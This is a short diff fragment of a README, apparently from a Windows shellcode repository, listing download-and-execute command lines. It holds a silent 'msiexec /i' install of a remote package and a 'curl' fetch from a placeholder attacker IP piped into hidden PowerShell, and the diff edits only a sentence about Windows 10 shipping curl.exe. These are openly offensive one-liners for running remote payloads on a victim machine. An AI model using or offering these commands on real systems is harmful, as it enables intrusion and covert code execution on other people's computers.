kartikdurg/Windowsx86-Shellcode/README.md

 	Command-Line:  msiexec /i http://server/package.msi /qn

 2).
-Windows 10 version 1803 (and earlier, with insider build 17063) includes a native curl.exe (and tar.exe ) in C:\Windows\System32\, which you can access right from your regular CMD.
+Windows 10 version 1803 (and earlier, with insider build 17063) includes a native curl.exe in C:\Windows\System32\, which you can access right from your regular CMD.

 	Command-Line: curl http://<attacker-ip>/<payload-name>.txt | powershell -w h